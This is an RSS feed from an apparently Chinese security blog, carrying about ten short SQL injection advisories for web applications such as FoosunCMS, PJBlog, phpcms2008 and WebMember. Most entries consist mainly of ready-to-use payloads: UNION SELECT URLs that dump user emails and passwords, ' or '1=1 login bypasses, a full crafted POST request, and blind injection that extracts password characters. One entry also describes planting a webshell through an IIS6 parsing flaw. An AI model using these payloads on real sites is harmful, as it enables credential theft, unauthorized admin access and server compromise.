<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>SpookZanG &#187; 注入</title>
	<atom:link href="http://www.spookzang.net/article/tag/%e6%b3%a8%e5%85%a5/feed" rel="self" type="application/rss+xml" />
	<link>http://www.spookzang.net</link>
	<description>安全,漏洞,发现,共享,交流</description>
	<lastBuildDate>Tue, 27 Jul 2010 15:28:29 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>Swoopo Clone 2010 SQL注入漏洞</title>
		<link>http://www.spookzang.net/article/1465</link>
		<comments>http://www.spookzang.net/article/1465#comments</comments>
		<pubDate>Mon, 28 Jun 2010 03:02:23 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[脚本相关]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[注入]]></category>
		<category><![CDATA[漏洞]]></category>

		<guid isPermaLink="false">http://www.spookzang.net/?p=1465</guid>
		<description><![CDATA[Swoopo Clone是一款收费的拍卖PHP程序，而这回却出现了0DAY，而且是不应该有的SQL注入漏洞，至笔者发布时候，官方还没有对漏洞进行修复。]]></description>
			<content:encoded><![CDATA[<p>作者：L0rd CrusAd3r</p>
<p><strong>程序介绍：</strong><br />
Swoopo Clone是一款收费的拍卖程序。</p>
<p><strong>利用方法：</strong></p>
<p>http://server/index.php?show=product&#038;id=[sql]</p>
<p><strong>官方补丁：</strong><br />
暂无</p>
]]></content:encoded>
			<wfw:commentRss>http://www.spookzang.net/article/1465/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>风讯网站管理系统存在SQL漏洞</title>
		<link>http://www.spookzang.net/article/1442</link>
		<comments>http://www.spookzang.net/article/1442#comments</comments>
		<pubDate>Sat, 26 Jun 2010 09:56:24 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[脚本相关]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[注入]]></category>
		<category><![CDATA[漏洞]]></category>
		<category><![CDATA[风讯]]></category>

		<guid isPermaLink="false">http://www.spookzang.net/?p=1442</guid>
		<description><![CDATA[FoosunCMS是一款具有强大的功能的基于ASP+ACCESS/MSSQL构架的内容管理软件。

这次出现了SQL注入漏洞，这个漏洞导致HACK能轻而易举的拿下用风讯搭建的网站。请各位站长注意！

影响版本：FooSun > 5.0]]></description>
			<content:encoded><![CDATA[<p><strong>影响版本:</strong><br />
FooSun > 5.0</p>
<p><strong>程序介绍</strong>:<br />
FoosunCMS是一款具有强大的功能的基于ASP+ACCESS/MSSQL构架的内容管理软件。</p>
<p><strong>漏洞分析</strong>:<br />
在文件\User\award\awardAction.asp中：</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>14
15
16
17
18
19
20
21
22
23
</pre></td><td class="code"><pre class="asp" style="font-family:monospace;">&nbsp;
Integral<span style="color: #006600; font-weight: bold;">=</span>NoSqlHack<span style="color: #006600; font-weight:bold;">&#40;</span><span style="color: #990099; font-weight: bold;">request</span>.<span style="color: #330066;">QueryString</span><span style="color: #006600; font-weight:bold;">&#40;</span><span style="color: #cc0000;">&quot;Integral&quot;</span><span style="color: #006600; font-weight:bold;">&#41;</span><span style="color: #006600; font-weight:bold;">&#41;</span> <span style="color: #ff6600;">//第14行</span>
&nbsp;
<span style="color: #990099; font-weight: bold;">if</span> action<span style="color: #006600; font-weight: bold;">=</span><span style="color: #cc0000;">&quot;join&quot;</span> <span style="color: #990099; font-weight: bold;">then</span>
&nbsp;
User_Conn.<span style="color: #330066;">execute</span><span style="color: #006600; font-weight:bold;">&#40;</span><span style="color: #cc0000;">&quot;Insert into FS_ME_User_Prize (prizeid,usernumber,awardID) values(&quot;</span><span style="color: #006600; font-weight: bold;">&amp;</span>CintStr<span style="color: #006600; font-weight:bold;">&#40;</span>prizeID<span style="color: #006600; font-weight:bold;">&#41;</span><span style="color: #006600; font-weight: bold;">&amp;</span><span style="color: #cc0000;">&quot;,'&quot;</span><span style="color: #006600; font-weight: bold;">&amp;</span>session<span style="color: #006600; font-weight:bold;">&#40;</span><span style="color: #cc0000;">&quot;FS_UserNumber&quot;</span><span style="color: #006600; font-weight:bold;">&#41;</span><span style="color: #006600; font-weight: bold;">&amp;</span><span style="color: #cc0000;">&quot;',&quot;</span><span style="color: #006600; font-weight: bold;">&amp;</span>CintStr<span style="color: #006600; font-weight:bold;">&#40;</span>awardID<span style="color: #006600; font-weight:bold;">&#41;</span><span style="color: #006600; font-weight: bold;">&amp;</span><span style="color: #cc0000;">&quot;)&quot;</span><span style="color: #006600; font-weight:bold;">&#41;</span>
&nbsp;
<span style="color: #008000;">'获得当前参加人数--------------------------------</span>
&nbsp;
User_Conn.<span style="color: #330066;">execute</span><span style="color: #006600; font-weight:bold;">&#40;</span><span style="color: #cc0000;">&quot;Update FS_ME_Users set Integral=(Integral-&quot;</span><span style="color: #006600; font-weight: bold;">&amp;</span>Integral<span style="color: #006600; font-weight: bold;">&amp;</span><span style="color: #cc0000;">&quot;) where usernumber='&quot;</span><span style="color: #006600; font-weight: bold;">&amp;</span>session<span style="color: #006600; font-weight:bold;">&#40;</span><span style="color: #cc0000;">&quot;FS_UserNumber&quot;</span><span style="color: #006600; font-weight:bold;">&#41;</span><span style="color: #006600; font-weight: bold;">&amp;</span><span style="color: #cc0000;">&quot;'&quot;</span><span style="color: #006600; font-weight:bold;">&#41;</span></pre></td></tr></table></div>

<p>数字变量Integral使用过滤字符的函数过滤导致sql注入漏洞的产生，导致可以修改表FS_ME_User的任意内容，配合系统的其他功能可以拿到webshell</p>
<p><strong>漏洞利用</strong>:<br />
注册用户登陆后，访问Url:</p>
<p>http://[spookzang.net]/User/award/awardAction.asp?action=join&#038;awardID=1&#038;prizeID=1&#038;Integral=0),usernumber= 0x6C006C002E00610073007000,LoginNum=(1</p>
<p>退出后再登陆，在文件管理处上传后缀为doc的webshell就可以拿到webshell。（利用IIS6对文件夹为*.asp的解析漏洞） </p>
<p><*来源: Bug.Center.Team<br />
链接: http://wavdb.com/vuln/1672<br />
*></p>
]]></content:encoded>
			<wfw:commentRss>http://www.spookzang.net/article/1442/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WebMember SQL注入漏洞</title>
		<link>http://www.spookzang.net/article/713</link>
		<comments>http://www.spookzang.net/article/713#comments</comments>
		<pubDate>Tue, 02 Jun 2009 22:33:27 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[脚本相关]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[注入]]></category>

		<guid isPermaLink="false">http://www.spookzang.net/?p=713</guid>
		<description><![CDATA[利用方法： http://[host]/[script_path]/form.php?formID=-100 UNION SELECT 1,2,3,concat_ws(0x3e,email,password),5 FROM mem_user&#8211;]]></description>
			<content:encoded><![CDATA[<p>利用方法：</p>
<p>http://[host]/[script_path]/form.php?formID=-100 UNION SELECT 1,2,3,concat_ws(0x3e,email,password),5 FROM mem_user&#8211;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.spookzang.net/article/713/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Million Dollar Text Links SQL注入漏洞</title>
		<link>http://www.spookzang.net/article/707</link>
		<comments>http://www.spookzang.net/article/707#comments</comments>
		<pubDate>Mon, 01 Jun 2009 02:29:20 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[脚本相关]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[注入]]></category>

		<guid isPermaLink="false">http://www.spookzang.net/?p=707</guid>
		<description><![CDATA[利用方法: http://www.[SpookZanG].net/demo/million/admin.link.modify.php?id=-6%20UNION%20SELECT%201,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9&#8211;]]></description>
			<content:encoded><![CDATA[<p>利用方法:</p>
<p>http://www.[SpookZanG].net/demo/million/admin.link.modify.php?id=-6%20UNION%20SELECT%201,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9&#8211;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.spookzang.net/article/707/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PJBlog个人博客系统cls_logAction.asp文件存在注入漏洞</title>
		<link>http://www.spookzang.net/article/660</link>
		<comments>http://www.spookzang.net/article/660#comments</comments>
		<pubDate>Sat, 09 May 2009 03:29:56 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[脚本相关]]></category>
		<category><![CDATA[asp]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[注入]]></category>
		<category><![CDATA[脚本]]></category>

		<guid isPermaLink="false">http://www.spookzang.net/?p=660</guid>
		<description><![CDATA[影响版本:PJBlog 3.0.6.170，程序介绍:PJBlog一套开源免费的中文个人博客系统程序，采用asp+Access的技术，具有相当高的运作效能以及更新率，也支持目前Blog所使用的新技术。]]></description>
			<content:encoded><![CDATA[<p> </p>
<p><strong>影响版本:</strong>PJBlog 3.0.6.170<br />
<strong>程序介绍:</strong><br />
PJBlog一套开源免费的中文个人博客系统程序，采用asp+Access的技术，具有相当高的运作效能以及更新率，也支持目前Blog所使用的新技术。</p>
<p><strong>漏洞分析:</strong><br />
在文件class/cls_logAction.asp中：</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
</pre></td><td class="code"><pre class="language" style="font-family:monospace;">oldcate=request.form(&quot;oldcate&quot;)  //第429行
oldctype=request.form(&quot;oldtype&quot;)
&nbsp;
D = conn.execute(&quot;select cate_Part from blog_Category where  cate_ID=&quot;&amp;oldcate)(0)</pre></td></tr></table></div>

<p>程序没有对变量oldcate做任何过滤放入sql查询语句中，导致注入漏洞的产生。</p>
<p>漏洞利用:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre></td><td class="code"><pre class="language" style="font-family:monospace;">POST /blogedit.asp HTTP/1.1
Accept: application/x-shockwave-flash,  image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword,  application/vnd.ms-excel, application/vnd.ms-powerpoint, */*
Referer: http://127.0.0.1/blogedit.asp?id=1
Accept-Language:  zh-cn
Content-Type: application/x-www-form-urlencoded
UA-CPU:  x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible;  MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0; .NET CLR 2.0.50727)
Host:  127.0.0.1
Content-Length: 513
Connection: Keep-Alive
Cache-Control:  no-cache
Cookie:  __utma=96992031.4542583209449947600.1239335726.1240296350.1240324232.7;  __utmz=96992031.1239335726.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);  PJBlog3Setting=ViewType=normal;  PJBlog3=memRight=111111111111&amp;memHashKey=c80f369e20b317566f736dbc70839834745d9c20&amp;memName=admin&amp;exp=2010%2D4%2D21;  ASPSESSIONIDCCDSDABA=OEBBHCODJFKIJEGKGCPHGMCP
&nbsp;
id=1&amp;log_editType=1&amp;action=post&amp;log_IsDraft=False&amp;title=xxx&amp;log_CateID=3&amp;cname=xxx&amp;ctype=0&amp;oldcname=xxx&amp;oldtype=0&amp;oldcate=3201=1&amp;log_weather=sunny&amp;log_Level=level3&amp;log_comorder=1&amp;blog_pws=0&amp;log_Readpw=&amp;log_Pwtips=&amp;c_pws=0&amp;blog_Meta=0&amp;evio_KeyWords=xxx&amp;evio_Description=web+safe&amp;log_From=%E6%9C%AC%E7%AB%99%E5%8E%9F%E5%88%9B&amp;log_FromURL=http%3A%2F%2Flocalhost%2Fbackci%2F&amp;PubTimeType=com&amp;PubTime=2009-4-21+15%3A54%3A46&amp;tags=&amp;UBBfonts=&amp;UBBfonts=&amp;UBBfonts=&amp;UBBmethod=on&amp;Message=web+safe&amp;log_Intro=web+safe&amp;log_Quote=</pre></td></tr></table></div>

<p>解决方案:<br />
厂商补丁：<br />
PJblog<br />
&#8212;&#8212;-<br />
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：</p>
<p>http://bbs.pjhome.net/thread-52214-1-1.html</p>
<p>信息来源:<br />
<*来源: Bug.Center.Team http://www.cnbct.org<br />
链接: http://wavdb.com/vuln/1410 *></p>
]]></content:encoded>
			<wfw:commentRss>http://www.spookzang.net/article/660/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>chCounter 3.1.3的SQL注入漏洞！</title>
		<link>http://www.spookzang.net/article/603</link>
		<comments>http://www.spookzang.net/article/603#comments</comments>
		<pubDate>Wed, 22 Apr 2009 05:43:15 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[脚本相关]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[注入]]></category>
		<category><![CDATA[脚本]]></category>

		<guid isPermaLink="false">http://www.spookzang.net/?p=603</guid>
		<description><![CDATA[前提：magic quotes = off 来到登录页面 http://[SpookZanG]//counter/stats/index.php 用户名与密码都输入： or &#8216;=&#8217; 即可。]]></description>
			<content:encoded><![CDATA[<p>前提：magic quotes = off</p>
<p>来到登录页面</p>
<p>http://[<span style="color: #000000;">SpookZanG</span>]//counter/stats/index.php</p>
<p>用户名与密码都输入： or &#8216;=&#8217;</p>
<p>即可。</p>
]]></content:encoded>
			<wfw:commentRss>http://www.spookzang.net/article/603/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>NetHoteles 2.0/3.0 存在注入漏洞</title>
		<link>http://www.spookzang.net/article/601</link>
		<comments>http://www.spookzang.net/article/601#comments</comments>
		<pubDate>Tue, 21 Apr 2009 02:40:58 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[脚本相关]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[注入]]></category>
		<category><![CDATA[脚本]]></category>

		<guid isPermaLink="false">http://www.spookzang.net/?p=601</guid>
		<description><![CDATA[来到后台： http://www.[spookzang].net/superadmin (默认) 用户名和密码分别输入：&#8217; or &#8217;1=1 即可登入。]]></description>
			<content:encoded><![CDATA[<p>来到后台：</p>
<p>http://www.[spookzang].net/superadmin (默认)</p>
<p>用户名和密码分别输入：&#8217; or &#8217;1=1</p>
<p>即可登入。</p>
]]></content:encoded>
			<wfw:commentRss>http://www.spookzang.net/article/601/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Online Guestbook存在SQL注入漏洞</title>
		<link>http://www.spookzang.net/article/599</link>
		<comments>http://www.spookzang.net/article/599#comments</comments>
		<pubDate>Mon, 20 Apr 2009 09:36:54 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[脚本相关]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[注入]]></category>
		<category><![CDATA[脚本]]></category>

		<guid isPermaLink="false">http://www.spookzang.net/?p=599</guid>
		<description><![CDATA[利用方法 http://www.[SpookZanG].Net/demo/OGP/ogp_show.php?display=10 and substring(@@version,1,1)=5]]></description>
			<content:encoded><![CDATA[<p>利用方法</p>
<p>http://www.[<span style="color: #000000;">SpookZanG].Net</span>/demo/OGP/ogp_show.php?display=10 and substring(@@version,1,1)=5</p>
]]></content:encoded>
			<wfw:commentRss>http://www.spookzang.net/article/599/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>My Dealer Cms 2.0存在SQL注入漏洞！</title>
		<link>http://www.spookzang.net/article/607</link>
		<comments>http://www.spookzang.net/article/607#comments</comments>
		<pubDate>Mon, 13 Apr 2009 21:48:22 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[脚本相关]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[注入]]></category>
		<category><![CDATA[脚本]]></category>

		<guid isPermaLink="false">http://www.spookzang.net/?p=607</guid>
		<description><![CDATA[来到登入点：（默认） http://[SpookZanG]/demo/admin/ 用户名和密码输入： &#8216; or &#8217;1=1 即可。]]></description>
			<content:encoded><![CDATA[<p>来到登入点：（默认）</p>
<p>http://<span style="color: #000000;">[SpookZanG]</span>/demo/admin/</p>
<p>用户名和密码输入：</p>
<p>&#8216; or &#8217;1=1</p>
<p>即可。</p>
]]></content:encoded>
			<wfw:commentRss>http://www.spookzang.net/article/607/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>phpcms2008 ask的0DAY</title>
		<link>http://www.spookzang.net/article/491</link>
		<comments>http://www.spookzang.net/article/491#comments</comments>
		<pubDate>Fri, 20 Mar 2009 12:43:14 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[脚本相关]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[注入]]></category>
		<category><![CDATA[漏洞]]></category>
		<category><![CDATA[脚本]]></category>

		<guid isPermaLink="false">http://www.0day.hk/?p=491</guid>
		<description><![CDATA[受影响程序： phpcms2008 gbk，漏洞文件：ask/search_ajax.php]]></description>
			<content:encoded><![CDATA[<p>受影响程序： phpcms2008 gbk</p>
<p>漏洞文件：ask/search_ajax.php</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
</pre></td><td class="code"><pre class="language" style="font-family:monospace;">&lt;?php
require ‘./include/common.inc.php’;
require_once MOD_ROOT.‘include/ask.class.php’;
$ask = new ask();
header(‘Content-type: text/html; charset=utf-8′);
if(strtolower(CHARSET) != ‘utf-8′) $q = iconv(CHARSET, ‘utf-8′, $q);
if($q)
{
$where = “ title LIKE ’%$q%’ AND status = 5″;
}
else
{
exit(‘null’);
}
$infos = $ask-&gt;listinfo($where, ‘askid DESC’, ”, 10);
&nbsp;
foreach($infos as $key=&gt;$val)
{
$val['title'] = str_replace($q, ‘&lt;span class=”c_orange”&gt;’.$q.‘&lt;/span&gt;’, $val['title']);
$info[$key]['title'] = CHARSET != ‘utf-8′ ? iconv(CHARSET, ‘utf-8′, $val['title']) : $val['title'];
$info[$key]['url'] = $val['url'];
}
&nbsp;
echo(json_encode($info));
?&gt;</pre></td></tr></table></div>

<p>ask/search_ajax.php?q=s%E6′/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0×706870636D73)>52%23<br />
ask/search_ajax.php?q=s%E6&#8242;/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23<br />
From http://www.nukeblog.cn/article/125.htm</p>
]]></content:encoded>
			<wfw:commentRss>http://www.spookzang.net/article/491/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
